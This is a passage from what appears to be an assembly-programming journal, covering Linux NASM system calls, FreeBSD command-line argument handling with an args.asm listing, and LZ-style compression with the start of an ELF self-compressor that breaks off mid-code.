Then we decrement it by one, because the program name isn't really an argument. Depending on if you need to later use the argument count later on, you will see other arguments put into either the same register or a different one. Now, "pop ebp" puts the program name into ebp, and then the next "pop ebp" overwrites it, and puts "42" into ebp. The last value of ebp is not preserved, and since you have popped it off of the stack, it is gone forever. Doing more interesting things ----------------------------- Moving on, how exactly do you interact with the rest of the system? You know how to manipulate the stack, but how to you get the current time, or make a directory, or fork a process, or any other wonderful thing a Unix box can do? I am pleased to introduce you to the "system call". A system call is the translator that lets user-land programs (which is what you are writing), talk to the kernel, who is in kernel-land, of course. Each syscall has a unique number, so that you can put it into the eax register, and tell the kernel "Yo, wake up and do this", and it hopefully will. If the syscall takes arguments, which most do, these go into ebx,ecx,edx,esi,edi,ebp , in that order. Some example code always helps: mov eax,1 ; the exit syscall number mov ebx,0 ; have an exit code of 0 int 80h ; interrupt 80h, the thing that pokes the ; kernel and says, "do this" The preceding code is equivalent to having a "return 0" at the end of your main function. Ok, ok, still not very useful, but we are getting there. A more useful example: pop ebx ; argc pop ebx ; argv[0] pop ebx ; the first real arg, a filename mov eax,5 ; the syscall number for open() ; we already have the filename in ebx mov ecx,0 ; O_RDONLY, defined in fcntl.h int 80h ; call the kernel ; now we have a file descriptor in eax test eax,eax ; lets make sure it is valid jns file_function ; if the file descriptor does not have the ; sign flag ( which means it is less than 0 ) ; jump to file_function mov ebx,eax ; there was an error, save the errno in ebx mov eax,1 ; put the exit syscall number in eax int 80h ; bail out Now we are starting to get somewhere. You should be starting to realize that there is no black magic or voodoo in assembly programming, just a very strict set of rules. If you know how the rules work, you can do just about everything. Though I haven't tried it, I have seen network coding in assembly, console graphics ( intros! ), and yes, even X windows code in assembly. So where do find out all of the semantics for all of the various system calls? Well first, the numbers are listed in asm/unistd.h in Linux, and sys/syscall.h in the *BSD's. To find out information about each one, such as what arguments they take and what values they return, look no further that your man pages! I will hold your hand in finding out about the next syscall we are going to use, read(). "man read" didn't give you exactly what you wanted did it? That is because program manuals and shell manuals are shown before the programming manuals are. If you are using bash, you probably are looking at the BASH_BUILTINS(1) man page. To get to what you really want, try "man 2 read". Now you should be looking at sections like SYNOPSIS, DESCRIPTION, DESCRIPTION, ERRORS and a few others. These are the most important. Take a look at synopsis, it should look like: ssize_t read(int fd, void *buf, size_t count); NOTE: ssize_t and size_t are just integers. The first argument is the file descriptor, followed by the buffer, and then how many bytes to read in, which should be however long the buffer is. For the best performance, use 8192, which is 8k, as your count. Make your buffer a multiple of this, 8192 is fine. Now you know what to put in your registers. Reading the RETURN VALUE section, you should see how read() returns the number of bytes it read, 0 for EOF, and -1 for errors. file_function: mov ebx,eax ; sys_open returned file descriptor into eax mov eax,3 ; sys_read ; ebx is already setup mov ecx,buf ; we are putting the ADDRESS of buf in ecx mov edx,bufsize ; we are putting the ADDRESS of bufsize in edx int 80h ; call the kernel test eax,eax ; see what got returned jz nextfile ; got an EOF, go to read the next file js error ; got an error, bail out ; if we are here, then we actually read some ; bytes Now we have a chunk of the file read ( up to 8192 bytes ), and sitting in what you would call an array in C. What can you do now? Well, the first thing that comes to mind is print it out. Wait a sec, there is no man page for printf in section 2. What's the deal? Well, printf is a library function, implemented by good ol' libc. You are going to have to dig a little deeper, and use write(). So now you looking at the man page. write() writes to a file descriptor. What the hell good does that do me? I want to print it out! Well, remember, everything in Unix is a file, so all you have to do is write to STDOUT. From /usr/include/unistd.h, it is defined as 1 . So the next chunk of code looks like: mov edx,eax ; save the count of bytes for the write syscall mov eax,4 ; system call for write mov ebx,1 ; STDOUT file descriptor ; ecx is already set up int 80h ; call kernel ; for the program to properly exit instead of segfaulting right here ; ( it doesn't seem to like to fall off the end of a program ), call ; a sys_exit mov eax,1 mov ebx,0 int 80h What you have now just written is basically "cat", except it only prints the first 8192 bytes. Portability ----------- In the preceding section, you saw how the call the kernel in Linux with NASM. This is fine if you are never ever going to use another operating system, and you enjoy looking up the system kernel numbers, but is not very practical, and extremely unportable. What to do? There is a great little package called asmutils started by Konstantin Boldyshev, who runs http://www.linuxassembly.org. If you haven't read all of the good documentation on that site, that should be your next step. Asmutils provides an easy to use and portable interface to doing system calls in whichever Unix variant you use ( and even has support for BeOS.) Even if you aren't interesting in using these Unix utilities that are rewritten in assembly, if you want to write portable NASM code, you are better off using it's header files than rolling your own. With asmutils, your code will look like this: %include "system.inc" ; all the magic happens here CODESEG ; .text section START: ; always starts here sys_write STDOUT,[somestring],[strlen] END ; code ends here This is much more readable then doing everything by system call number, and it will be portable across Linux,FreeBSD,OpenBSD,NetBSD,BeOS and a few other lesser known OS's. You can now use system calls by name, and use standard constants like STDOUT or O_RDONLY, just like in C. The "%include" statement works precisely as it does in C, sourcing the contents of that file. To learn more about how to use asmutils, read the Asmutils-HOWTO, which is in the doc/ directory of the source. Also, to get the latest source, use the following commands: export CVS_RSH=ssh cvs -d:pserver:anonymous@cvs.linuxassembly.org:/cvsroot/asm login cvs -z3 -d:pserver:anonymous@cvs.linuxassembly.org:/cvsroot/asm co asmutils This will download the newest, bleeding edge source into a subdirectory called "asmutils" of your current directory. Take a look at some of the simpler programs, such as cat,sleep,ln,head or mount, you will see that there isn't anything horrendously difficult about them. head was my first assembly program, I made extra comments on purpose, so that would be a good place to start. Debugging --------- Strace will definitely by your friend. It is the easiest tool to use to debug your problem. Most of the time when writing in assembly, other that syntax errors, you will just get a segmentation fault. This provides you with a ZERO useful information. With strace, at least you will see after which system call your program is choking. Example: $ strace ./cal2 execve("./cal2", ["./cal2"], [/* 46 vars */]) = 0 read(1, "", 0) = 0 --- SIGSEGV (Segmentation fault) --- +++ killed by SIGSEGV +++ Now you know to look after your first read system call. But it starts getting tricky when you have lots of pure assembly, which strace cannot show. That's when gdb comes into play. There is some very good information about using gdb and enabling debugging information in NASM in the Asmutils-HOWTO, so I won't reproduce it here. For a quick and dirty solution, you could do something like this: %define notdeadyet sys_write STDOUT,0,__LINE__ Now you can litter the source with notdeadyet's, and hopefully see where things are going astray with the help of strace. Obviously this is not practical for complex bugs or voluminous source, but works great for finding careless mistakes when you are starting out. Example: $ strace ./cal2 execve("./cal2", ["./cal2"], [/* 46 vars */]) = 0 write(1, NULL, 16) = 16 write(1, NULL, 26) = 26 write(1, NULL, 41) = 41 --- SIGSEGV (Segmentation fault) --- +++ killed by SIGSEGV +++ Now we know that we are still going on line 41, and the problem is after that. Next ? ------ Now it is your turn to explore the insides of your operating system, and take pride in understanding what's really going on under the covers. Reference --------- Places to get more information: Linux Assembly - http://www.linuxassembly.org NASM Manual ( available in doc/html directory of source ) Assembly Programming Journal - http://asmjournal.freeservers.com/ Mammon_'s textbase - http://www.eccentrica.org/Mammon/sprawl/textbase.html Art Of Assembly - http://webster.cs.ucr.edu/Page_asm/ArtOfAsm.html Sandpile - http://www.sandpile.org comp.lang.asm.x86 NASM - http://www.cryogen.com/Nasm Asmutils-HOWTO - doc/ directory of asmutils Feedback -------- Feedback is welcome, hopefully this was of some use to budding Unix assembly programmers. Availability ------------ The most current version of this document should be available at http://www.leto.net/papers/writing-a-useful-program-with-nasm.txt . Appendix : Jumps ---------------- When I first began looking at assembly source code, I saw all these crazy instructions like "jnz" and the like. It looked like I was going to have to remember the names of a whole slew of inanely named instructions. But after a while it finally clicked what they all were. They are basically just "if statements" that you know and love, that work off of the EFLAGS register. What is the EFLAGS register? Just a register with lots of different bits that are set to zero or one, depending on the previous comparison that the code made. Some code to set the stage: mov eax,82 mov ebx,69 test eax,ebx jle some_function What on earth is "jle"? Why it's "Jump if Less than or Equal." If eax was less than or equal to ebx, code execution will jump to "some_function", if not, it keeps chugging along. Here is a list which will hopefully shed some light on this part of assembly that was mysterious to me when I began. Some of these are logically the same, but are provided because is some situations one will be more intuitive than the other. Jump Meaning Signedness (S or U) ----------------------------------------------------------- ja | Jump if above | U jae | Jump if above or Equal | U jb | Jump if below | U jbe | Jump if below or Equal | U jc | Jump if Carry | jcxz | Jump if CX is Zero | je | Jump if Equal | jecxz | Jump if ECX is Zero | jz | Jump if Zero | jg | Jump if greater | S jge | Jump if greater or Equal | S jl | Jump if less | S jle | Jump if less or Equal | S jmp | Unconditional jump | jna | Jump Not above | U jnae | Jump Not above or Equal | U jnc | Jump if Not Carry | jncxz | Jump if CX Not Zero | jne | Jump if Not Equal | jng | Jump if Not greater | S jnge | Jump if Not greater or Equal | S jnl | Jump if Not less | S jnle | Jump if Not less or Equal | S jno | Jump if Not Overflow | jnp | Jump if Not Parity | jns | Jump if Not signed | jnz | Jump if Not Zero | jo | Jump if Overflow | jp | Jump if Parity | jpe | Jump if Parity Even | jpo | Jump if Parity Odd | js | Jump if signed | jz | Jump if Zero | ----------------------------------------------------------- ::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. :::\_____\:::::::::::............................................THE.UNIX.WORLD Command Line in FreeBSD by G. Adam Stanislav In my Issue 8 article I mentioned I did not know how command line parameters (or arguments) were passed to programs under FreeBSD. I have received some feedback, both from the FreeBSD community and APJ readers. Thanks to that feedback, I can now pass this information on to you. Further, this information should be valid, more or less, for all 386 based Unix and Unix-like operating systems. At any rate, if your Unix variety does not come with the information on its command line parameters, chances are that, if you adjust my sample code to use the kernel interface of your OS, it will work just fine. Code startup ------------ Unix is much more security-conscious than MS DOS and MS Windows. While DOS/Windows assembly language programmers may be used to the operating system loading their code and then CALLing it (so you can exit with a simple RET, and possibly crash the system), Unix creates a new process for each program. This process is separate from the kernel and from all other processes. Hence, the system does not CALL your code, it JMPs to it. If you issue a RET, you will crash your program, but Unix will continue running unharmed. At least that's the theory. However, under FreeBSD it is the practice as well: I tried it and can vouch for it. The top of the stack -------------------- Before the Unix system jumps to your code, it pushes some information on the top of the stack: Your stack, that is, not system stack, so you can access it all from your own code. Here is what the stack contains, starting at the top: number of arguments ("argc") argument 0 argument 1 ... argument n (n = argc - 1) NULL pointer environment 0 environment 1 ... environment n NULL pointer Not all of these are necessarily there (e.g., if the program was called with no arguments). However, the number of arguments, argument 0, and the two NULL pointers are always present. Argument 0 is not a command line parameter in the sense DOS programmers are used to find. Instead, it is the name of the program. C programmers will find it as the familiar argv[0]. Another important difference between DOS and Unix is that DOS programs just give you the full command line, i.e., whatever appears after the name of the program, including any leading and trailing blanks. It is then up to the programmer to strip all extra blanks. Compared to that, parsing the Unix command line is much simpler as the system does some of the hard work for you. The individual arguments are separated, and usually contain no leading/trailing blanks. When they do, they are there because the program caller wanted them there. Let me illustrate. Suppose the user has typed the following command: ./args Hello, world. Here I come! In that case, the top of the stack will look like this: 6 ./args Hello, world. Here I come! 0 environment 0 environment 1 ... environment n 0 The arguments are nicely separated and contain no blanks. Now, suppose the user has typed: ./args Hello, world. "Here I come!" The top of the stack looks like this: 4 ./args Hello, world. Here I come! 0 (etc) This system, besides making it easier to parse, has a great advantage over the DOS way: It has no practical limit on the size of the command line. Accessing the information ------------------------- Because your program runs in its own process space, the stack is yours to do with as you please. You can simply save the information in some data structure and leave the stack intact, or you can pop it off as you need it. The C startup code uses the first approach: It saves the "argc" value in a local variable, the argument 0 in another. It finds the start of the environment variable list and stores it in a global variable. It then calls main, passing that information to it, i.e. main(argc, *argv[], env); The assembly language program can do that as well, but usually has no need to. If you process the command line at the start of your code, and never need to see it again, you can just pop it off the stack one by one, analyze it, set up any flags or other variables, etc. I have enclosed a simple assembly language program called args.asm below. All it does is print all the information the FreeBSD system has passed to it. It is useful as an example of one way of accessing the command line arguments (and the environment) by simply popping it off one at a time. It is also useful as a tool to study what format the arguments are in. For example, running it will show you that the environment is passed to your program in the form of name=value, where name is the name of the environment variable, value is whatever text string is assigned to it. You can assemble and link the program with NASM: nasm -f elf args.asm ld -o args args.o strip args Try running it with and without command line arguments. Try placing the arguments in single and double quotes, try all the nifty things a Unix shell will let you do, such as: ./args $HOME ./args `ls -la` ./args "`ls -la`" ./args '`ls -la`' ./args ./args Hello, world. Here I come! ./args Hello, world. "Here I come!" ./args ' Hello, world. Here I come ! ' ;-----------------------------------------------------------------------------; ; args.asm ; ; Print FreeBSD command line arguments and environment ; ; Copyright 2000 G. Adam Stanislav ; All rights reserved ;-----------------------------------------------------------------------------; section .data prgmsg db 'Program name:', 0Ah, 0Ah tab db 9 prglen equ $-prgmsg argmsg db 0Ah, 0Ah, 'Command line arguments:', 0Ah, 0Ah arglen equ $-argmsg envmsg db 0Ah, 'Environment variables:', 0Ah, 0Ah envlen equ $-envmsg huhmsg db "Hmmm... Something's wrong here...", 0Ah huhlen equ $-huhmsg section .code what.the.heck: ; Print the huhmsg to stderr and abort. push dword huhlen push dword huhmsg sub eax, eax mov al, 2 ; stderr push eax add al, al ; SYS_write push eax int 80h ; No need to clean up the stack since we're quitting now. sub eax, eax inc al ; return 1 (failure), SYS_exit push eax push eax int 80h ; ELF programs always start at _start global _start _start: ; We come here with "argc" on the top of the stack. Its value ; is at least 1. If not, something went seriously wrong. pop ecx ; ECX = argc jecxz what.the.heck ; Print the prgmsg sub eax, eax push dword prglen push dword prgmsg inc al ; stdout push eax push eax mov al, 4 ;SYS_write int 80h add esp, byte 16 ; Get argv[0], i.e., the program path pop ebx ; EBX = argv[0] ; argv[0] is a NUL-terminated string. We can find its ; length by scanning for the NUL. sub eax, eax sub ecx, ecx cld dec ecx mov edi, ebx repne scasb not ecx dec ecx ; Print the string push ecx push ebx inc al ; stdout push eax push eax mov al, 4 int 80h add esp, byte 16 ; Print the argmsg sub eax, eax push dword arglen push dword argmsg inc al ; stdout push eax push eax mov al, 4 ; SYS_write int 80h add esp, byte 16 ; By now, we have no idea what the value of argc was. ; We did not save it because we don't need it. ; The top of the stack now contains pointers ; to command line arguments (if any), followed ; by a NULL pointer. ; ; We simply print everything before the NULL. .argloop: pop ebx ; next argument or ebx, ebx je .env ; NULL pointer ; Print a tab sub eax, eax inc al push eax push dword tab push eax ; stdout mov al, 4 ; SYS_write push eax int 80h add esp, byte 16 ; Find the length sub ecx, ecx sub eax, eax dec ecx mov edi, ebx repne scasb not ecx ; Append a new line mov byte [edi-1], 0Ah ; Print the string push ecx push ebx inc al ; stdout push eax mov al, 4 ; SYS_write push eax int 80h add esp, byte 16 jmp short .argloop ; next .env: ; Print the envmsg sub eax, eax push dword envlen push dword envmsg inc al ; stdout push eax push eax mov al, 4 ; SYS_write int 80h add esp, byte 16 ; The top of the stack now contains pointers to ; environment variables, followed by a NULL pointer. ; We do what we did for the arguments: .envloop: pop ebx or ebx, ebx je .exit sub eax, eax inc al push eax push dword tab push eax mov al, 4 push eax int 80h add esp, byte 16 sub ecx, ecx sub eax, eax dec ecx mov edi, ebx repne scasb not ecx mov byte [edi-1], 0Ah push ecx push ebx inc al push eax mov al, 4 push eax int 80h add esp, byte 16 jmp short .envloop .exit: sub eax, eax ; return 0 (success) push eax inc al ; SYS_exit push eax int 80h ;--- End of program ----------------------------------------------------------; ::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. :::\_____\:::::::::::............................................THE.UNIX.WORLD Compressing data by Feryno Gabris First, intro about decompress. It's needed a routine called "get_next_bit". Here are 3 examples: ;----- get_next_bit: add dl,dl jnz no_new_byte lodsb mov dl,al adc dl,dl no_new_byte: ret ;----- get_next_bit: shl bx,1 jnz no_new_word mov bx,word [esi] inc esi inc esi rcl bx,1 no_new_word: ret ;----- get_next_bit: shl ebp,1 jnz no_new_dword lodsd rcl eax,1 xchg ebp,eax no_new_dword: ret ;----- And this is the usage of get_next_bit: ;----- mov esi,control_bits_offset mov edi,place_for_store_decompressed_bytes cld mov dl,80h B0: call get_next_bit jc L1 L0: ... some decompress instructions ... jmp B0 L1: ... some decompress instructions ... jmp B0 get_next_bit: add dl,dl ; this is instruction for put next bit to Carry ; highest bit will be become to Carry Flag and ; all lower bits are shifted left by 1 jnz no_new_byte ; next 3 instructions handle: all control_bits are processed and removed lodsb ; load new control_byte with 8 control_bits xchg edx,eax ; swap to another register only adc dl,dl ; puth highest control_bit to Carry ; shift all bits left by 1 ; recycle highest bit by MOV DL,80h ( bit=1 ; become to lower bit (bit 0.) ) no_new_byte: ret ;----- Note about two instructions: MOV DL,80h and ADC DL,DL. MOV DL,80h set up first control_bit, but this isn't true control_bit used for switch decompress between L0 and L1. Binary, 80h = 10000000b and highest bit (bit 7.) of 80h is bit=1 . All other bits=0 (bits 6. 5. 4. 3. 2. 1. 0.). Highest bit name can be as helper_control_bit. Helper_control_bit is never destroyed until decompress process ends. Helper_control_bit recycle through instruction ADC DL,DL after each loaded bits (8 bits by LODSB, 32 by LODSD) are used (after 8 times call get_next_bit with LODSB - 1st example procedure or 32 times call get_next_bit with LODSD 3nd example procedure). Image of first call get_next_bit and call get_next_bit after use and remove all control_bits is similar: Status is: DL register = 80h = 10000000b Here is instructions run: 1. ADD DL,DL 80h + 80h = 00h CarryFlag=1 ZeroFlag=1 (in Carry is helper_control_bit) 2. LODSB load control_byte with 8 control_bits, this instruction dont touch Carry 3. XCHG EDX,EAX swap control_byte to DL register, this instruction don't touch Carry (note that instructions PUSH,POP,MOV,XCHG,INC,LODSB,... don't change Carry) 4. ADC DL,DL recycle helper_control_bit, shift all bits left by 1 and new highest control_bit become to Carry This may be the most difficult part of decompress for understand. OK, next... Instructions on L0 and L1 can be as: L0: MOVSB JMP B0 L1: ... calculate ECX ... calculate EBX (delta, shift) PUSH ESI MOV ESI,EDI SUB ESI,EBX REPZ MOVSB POP ESI JMP B0 First mode, L0, isn't true decompress mode. Byte isn't compressed and it will be moved only. This mode has bad pack ratio, but must be used for store some bytes that can't be decompressed by L1 mode. It use 1 byte + 1 bit = 9 bits for store 1 byte = 8 bits. Second mode, L1, is true decompress mode. It calculate ECX number of bytes for decompress and calculate EBX, value that can be named as DELTA or SHIFT. This assume that chain of ECX bytes is on positions [EDI] and [EDI-EBX] in DATA bytes and ASM code like: MOV ESI,EDI SUB ESI,EBX REPZ CMPSB In data bytes compression process return with ZeroFlag=1 and ECX=0. It has good pack ratio, better for large chains (big ECX) and small shift (small EBX). Methods for calculate ECX and EBX are similar: It's lucid that ECX as well EBX aren't zero (ECX<>0 EBX<>0) hence highest bit of register is bit=1. First instruction for calculate ECX setup highest bit=1 and all next bits will be put by call get_next_bit. First instruction is: MOV ECX,1 or INC ECX if ECX=0. Next instructions are: CALL GET_NEXT_BIT ADC ECX,ECX ; as well RCL ECX,1 can be used How to terminate calculate ECX ? Again through use call get_next_bit ! Here is full routine for calculate ECX in decompress: MOV ECX,1 LCC0: CALL GET_NEXT_BIT ADC ECX,ECX CALL GET_NEXT_BIT JC LCC0 A minimal value ECX=2 can be produced by this code. ECX=1 isn't needed because this handle L0 mode (MOVSB) and L0 is more rational (but has bad pack ratio) for pack 1 byte as L1 mode. Example for calculate ECX=5=101b Highest bit is by INC ECX and i remove it - binary 01b Bit sequence for calculate ECX=5 is 01 10 binary. Calculate ECX=110100b Remove highest bit (this bit put INC ECX in decompress) - binary 10100b Bit sequence for calculate ECX is 11 01 11 01 00 binary. Calculate ECX=2=10b. Bit sequence is 0 0 binary. Calculate ECX=3=11b. Bit sequence is 1 0 binary. Calculate ECX=4=100b. Bit sequence is 0 1 0 0 binary. Calculate ECX=5=101b. Bit sequence is 0 1 1 0 binary. Calculate ECX=6=110b. Bit sequence is 1 1 0 0 binary. Calculate ECX=7=111b. Bit sequence is 1 1 1 0 binary. Calculate ECX=8=1000b. Bit sequence is 0 1 0 1 0 0 binary. Calculate ECX=16=10000b. Bit sequence is 0 1 0 1 0 1 0 0 binary. Calculate ECX=17=10001b. Bit sequence is 0 1 0 1 0 1 1 0 binary. Calculate ECX=18=10010b. Bit sequence is 0 1 0 1 1 1 0 0 binary. Calculate ECX=19=10011b. Bit sequence is 0 1 0 1 1 1 1 0 binary. Calculate EBX has some similar steps but some other steps. EBX can be EBX=1 and can be done as: MOV EBX,1 LCD0: CALL GET_NEXT_BIT ADC EBX,EBX CALL GET_NEXT_BIT JC LCD0 DEC EBX But by experients, it's often EBX>16 and for EBX<16 can be used another decompress mode. Calculate EBX=15 require 8 bits = 1 byte by use upper codes. It's a better use 8 bits = 1 byte for fill BL in EBX and calculate all bits highest of BL ( bits 31. - 8. ) by mode similar as calculate ECX. Here is it: MOV EBX,1 LCD0: CALL GET_NEXT_BIT ADC EBX,EBX CALL GET_NEXT_BIT JC LCD0 DEC EBX DEC EBX SHL EBX,8 MOV BL,byte [ESI] INC ESI Note that at least 2 times DEC EBX must be used for make EBX=0 possibility before SHL EBX,8 shift all bits higher and free BL. It's a mode named without_change_delta. Principle is 3 times use DEC EBX after calculate EBX=2. Calculate EBX=-1 indicate that calculate new delta isn't needed and old delta can be used. Old delta can be saved to unused register or stack by previous SUB ESI,EBX REPZ MOVSB and restored by mode without_change_delta. Principle of mode for pack 2-3 bytes with delta from 1 to 7Fh: 1. Load 1 byte = 8 bits 2. bit 0. = 1 indicate packed 2 bytes bit 0. = 0 indicate packed 3 bytes 3. high 7 bits ( bits 7. - 1. ) is delta Here is code example XOR EBX,EBX ; (EBX=0) MOV ECX,1 ; (ECX=1) MOV BL,[ESI] INC ESI SHR BL,1 ; this explore bit 0. and shift bits to make EBX=delta SBB CL,0 INC ECX INC ECX It's lucid that result BL=0 after this code is impossible delta. I make use of this for TERMINATE decompress process. A nice idea for pack 1 byte with delta from 1 to 15: XOR EBX,EBX MOV ECX,1 U02: MOV BL,00010000b CALL GET_NEXT_BIT ADC BL,BL JNC U02 Result EBX=0 is impossible delta and is used for pack byte 00h. This byte 00h is the most frequent byte in 32-bit opcodes. Last code continue... JNZ STORE_1_BYTE XCHG EBX,EAX ; make EAX=0 in 1 byte 32-bit opcode JMP STORE_BYTE ... STORE_1_BYTE: NEG EBX MOV AL,[EDI+EBX] STORE_BYTE: STOSB This is all about decompress intro. It's a part not implemented in decompress meanwhile. This is part like: CMP EBX,7D00h JNC ZVYS_O_DVE CMP EBX,500h JNC ZVYS_O_JENNU JMP NYST_NEZVYSUJ ZVYS_O_DVE: INC ECX ZVYS_O_JENNU: INC ECX NYST_NEZVYSUJ: It's not rational compress 2 bytes with delta > 4FFh because this request 2+(3*2)+8+2 = 18 bits and this can be done with 2 times use MOVSB mode (2*9=18 bits). U00: movsb ; require 1 byte = 8 bits call get_next_bit ; require 1 bit jnc U00 It's rational compress 4 bytes with delta > 7CFFh because this request 2+(8*2)+8+(2*2) = 28 bits without, 26 bits with this implementation. Intro for COMPRESS... --------------------- Some equivalents: DECOMPRESS COMPRESS MOV DL,80h CALL o_c_0 ; setup helper_control_bit CALL GET_NEXT_BIT CALL PUT_BIT Routines for scan chains, calculate bit request for pack this chain, pack chain, some optimalizations for found better chains are in source code. Source is ELF compressor, but this isn't universal ELF compressor. It support ELF header included in the source only. This header is enough for LINUX NASM use. You can download sources as well binaries from: http://feryno.home.sk/projects/compressELF.tar.gz ; ----- CUT HERE ----- ; fy1ename: a00.asm ; dezkrypt: ASM, ELF, k0mprezz0r, myny, exekutab1e ; Au~tchor: ch lap aj Feryno ; kompy1e: ; nasm -f bin a00.asm ; chmod +x a00 ; example of use ; ./a00 a00 compressed_a00 ; this self compress compressor BITS 32 org 08048000h ehdr: ; Elf32_Ehdr db 7Fh, 'ELF', 1, 1, 1 ; e_ident times 9 db 0 dw 2 ; e_type dw 3 ; e_machine dd 1 ; e_version dd START ; e_entry dd phdr - $$ ; e_phoff dd 0 ; e_shoff dd 0 ; e_flags dw ehdrsize ; e_ehsize dw phdrsize ; e_phentsize phdr: ; Elf32_Phdr dw 1 ; e_phnum ; p_type dw 0 ; e_shentsize dw 0 ; e_shnum ; p_offset dw 0 ; e_shstrndx ehdrsize equ $ - ehdr dd $$ ; p_vaddr dd $$ ; p_paddr dd filesize ; p_filesz dd memsize ; p_memsz dd 111b ; p_flags ; EWR ;Exec,Write,Read dd 1000h ; p_align phdrsize equ $ - phdr ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; START: pop ebx ; pop number of strings in comand line , must be =3 dec ebx dec ebx dec ebx ; set zero flag if after this EBX=0 pop ebx ; offset of first string ( executable file ) jz short mode ; number of strings = 3 = executable + file0 + file1 use: mov ecx,usage xor edx,edx mov dl,usagesize ;;; call WS jmp short ex00 mode: pop ebx ; pop offset of second string (first string, 0, second ; string, 0, third...) open: mov edi,f0h cld ; ebx is now pointed to second string in a shell = in_file open_f: xor ecx,ecx ; open flags, open for read-only ; xor eax,eax ; mov al,5 ; sys_open db 6Ah,5 ; push dword 5 pop eax int 80h ; open , note - return HANDLE in EAX or eax,eax jns short OK_open mov ecx,MEOF ; xor edx,edx ; mov dl,MEOFS db 6Ah,MEOFS ; push dword MEOFS pop edx ;;; call WS ex00: jmp short ex01 OK_open:stosd ; store file handle pop ebx ; EBX pointed to second filename out_file mov ecx,111101101b ; 111 owner can read, write, execute, 101 group can read, execute, but don't write / search, other 101 as well groups ; xor eax,eax ; mov al,8 ; sys_creat db 6Ah,8 ; push dword 8 pop eax int 80h ; creat , note - return HANDLE in EAX or eax,eax jns short OK_creat mov ecx,MECF ; xor edx,edx ; mov dl,MECFS db 6Ah,MECFS ; push dword MECFS pop edx ;;; call WS ex01: jmp short ex02 OK_creat:stosd ; store file handle ; EDI=f0s mov ebx,dword [edi - 4*2] ; handle for in_file xor ecx,ecx ; ECX=0 seek 0 bytes ; xor edx,edx ; inc edx ; inc edx ; EDX=2 seek to end of file + ECX=0 bytes db 6Ah,2 ; push dword 2 pop edx ; xor eax,eax ; mov al,13h ; sys_seek db 6Ah,19 ; push dword 19 pop eax int 80h ; note - return filesize in EAX or eax,eax jns short OK_seek_to_end mov ecx,MSEEF ; xor edx,edx ; mov dl,MSEEFS push byte MSEEFS pop edx ;;; call WS ex02: jmp short ex03 OK_seek_to_end: ;;; or eax,eax ;;; jz ex04 ; filesize=0 -> this file needn't compression cmp eax,f0b_size jnbe ex04 ; LIMIT f0b_size OVERFLOW !!!!!! cmp eax,4Ch jbe ex04 ; can't be a ELF executable, ELF header require 4C ; bytes stosd ; store in_file size to f0s_2 stosd ; store in_file size to f0s push eax ; and push it to stack xor ecx,ecx ; seek 0 bytes xor edx,edx ; seek to begin of file + ECX=0 bytes ; xor eax,eax ; mov al,13h db 6Ah,19 ; push dword 19 pop eax int 80h or eax,eax jns short OK_seek_to_begin mov ecx,MSEBF ; xor edx,edx ; mov dl,MSEBFS db 6Ah,MSEBFS ; push dword MSEBFS pop edx ;;; call WS ex03: jmp short wsex04 OK_seek_to_begin: mov esi,fy1eObuffer mov edi,f1b read_f: mov ecx,esi pop edx ; pop in_file_size from stack ; xor eax,eax ; mov al,3 ; sys_read db 6Ah,3 ; push dword 3 pop eax int 80h ; note - return in EAX number of bytes read (negative ; value if error) cmp eax,edx jz short OK_read oops: mov ecx,MERF ; xor edx,edx ; mov dl,MERFS db 6Ah,MERFS ; push dword MERFS pop edx wsex04: call WS ex04: jmp long ex05 ;short ex05 OK_read: add eax,esi mov dword [konyc_dat],eax ; mov ecx,4Ch ; header size db 6Ah,4Ch ; push dword 4Ch pop ecx sub dword [f0s],ecx repz movsb push esi mov esi,uncompress_routine mov cl,uncompress_routine_size repz movsb pop esi ; all self compressing is below this: movsb ; first byte, store it, this byte can't be compressed call o_C_0 ; setup [position] and byte on [position] dec dword [f0s] jz near terminate002 ; xor eax,eax ; mov dword [last_delta],eax ; I know : all data in UDATASEG is zero ; ; but use dirty tricks and must be sure ; ; dword [last_delta] can be non zero if ; ; compressed fy1e overwrite ; ; [last_delta] but i hope that ; ; compressed will be smaller as ; ; original executable call progress compress002: call scan002 ; some optimalizations for found better chain as chain by scan0002 cmp eax,1 jbe near cant_optimize_002_L0 ; on ESI is EAX lenght chain ; explore if on SI isn't chain with no change delta - if it's use this chain call scanincd ; include procedure in scan_ncd.inc jc cant_optimize_002_L1 mov ebx,dword [last_delta] ; pack without change delta has superior pack priority ( the best pack ratio ) jmp near A08_new_optimalization cant_optimize_002_L1: xchg dword [last_delta],ebx push ebx push eax push esi add esi,eax stc cmp dword [konyc_dat],esi jz chumaj inc esi cmp dword [konyc_dat],esi jz chumaj call scan002 call scanincd chumaj: pop esi pop eax pop ebx xchg dword [last_delta],ebx jnc near cant_optimize_002_L0 skus_toto_L0: push ebx push eax inc esi call scan002 call scanincd dec esi ; DEC don't change Carry !!! xchg ecx,eax ; number of bytes to ECX ; XCHG don't change Carry !!! pop eax ; POP don't change Carry !!! pop ebx jc try_next_optimalization ; use chain without change delta require less bits for pack ? call bitreq_02 push edx ; number of bits for pack non-optimized chain xchg ecx,eax ; number of bytes of non-optimized chain -> CX ; number of bytes of chain without change delta -> AX push ebx mov ebx,dword [last_delta] ; make EBX = EBX in last pack_02 call bitreq_02 ; return EDX = number of bits for pack chain ; without change delta pop ebx push edx push eax xor eax,eax ; simulate pack 1 byte first ( before chain ; without change delta ) call bitreq_02 pop eax add dword [esp+0*4],edx pop edx xchg ecx,eax ; restore EAX = number of bytes of ; non-optimized chain inc ecx ; number of bytes for pack optimized chain cmp eax,ecx pop ecx ; number of bits for pack non-optimized chain jc near pack_1_byte_look_better cmp edx,ecx jc near pack_1_byte_look_better try_next_optimalization: cmp eax,3 jc try_old_optimalization push ebx push eax inc esi inc esi call scan002 call scanincd dec esi dec esi xchg ecx,eax ; number of bytes to ECX ; XCHG don't change Carry !!! pop eax ; POP don't change Carry !!! pop ebx jc try_old_optimalization ; use chain without change delta require less bits for pack ? call bitreq_02 push edx ; number of bits for pack non-optimized chain xchg ecx,eax ; number of bytes of non-optimized chain -> CX ; number of bytes of chain without change delta -> AX push ebx mov ebx,dword [last_delta] ; make EBX = EBX in last pack_02 call bitreq_02 ; return EDX = number of bits for pack chain ; without change delta pop ebx push edx push eax xor eax,eax ; simulate pack 1 